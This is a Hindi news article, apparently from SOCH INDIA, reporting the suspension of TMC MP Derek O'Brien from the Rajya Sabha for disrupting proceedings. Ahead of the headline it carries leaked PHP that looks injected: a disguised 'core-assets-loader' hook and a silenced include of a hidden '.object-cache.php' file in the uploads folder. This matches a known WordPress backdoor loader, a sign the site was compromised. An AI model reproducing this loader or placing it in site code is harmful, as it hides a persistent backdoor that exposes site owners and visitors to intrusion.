add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Derek O’Brien Suspension: राज्यसभा से टीएमसी सांसद डेरेक ओ’ब्रायन सस्पेंड, सदन की कार्यवाही में बाधा डालने पर हुआ एक्शन, पूरे सत्र में नहीं हो सकेंगे शामिल – SOCH INDIA
Menu

देश
Derek O’Brien Suspension: राज्यसभा से टीएमसी सांसद डेरेक ओ’ब्रायन सस्पेंड, सदन की कार्यवाही में बाधा डालने पर हुआ एक्शन, पूरे सत्र में नहीं हो सकेंगे शामिल

nobanner

तृणमूल कांग्रेस (टीएमसी) सांसद डेरेक ओ’ब्रायन को संसद के शीतकालीन सत्र के शेष भाग से सस्पेंड कर दिया गया है. ओ’ब्रायन पर सदन की कार्यवाही में बाधा डालने का आरोप है, जिस पर कार्रवाई करते हुए उन्हें राज्यसभा से सस्पेंड कर दिया गया. लोकसभा में बुधवार दोपहर हुई सुरक्षा में चूक के बाद गुरुवार (14 दिसंबर) को एक बार फिर से संसद दोबारा शुरू हुई. इस दौरान ओ’ब्रायन ने राज्यसभा की कार्यवाही में बाधा डालना शुरू किया, जिस पर उन्हें सदन से जाने को कहा गया.

दरअसल, डेरेक ओ’ब्रायन ने संसद की सुरक्षा में हुई चूक पर चर्चा की मांग की थी. लेकिन इस पर राज्यसभा सभापति जगदीप धनखड़ ने टीएमसी सांसद का नाम लिया और उन्हें तुरंत सदन से बाहर जाने का आदेश दिया. धनखड़ ने कहा, ‘डेरेक ओ’ब्रायन को तुरंत सदन छोड़ने के लिए कहा जाता है. उनका कहना है कि वह सभापति की अवहेलना करेंगे. डेरेक ओ’ब्रायन का कहना है कि वह नियमों का सम्मान नहीं करेंगे. यह एक गंभीर कदाचार है. यह एक शर्मनाक घटना है.’ सभापति ने कहा कि सांसद का आचरण ठीक नहीं है.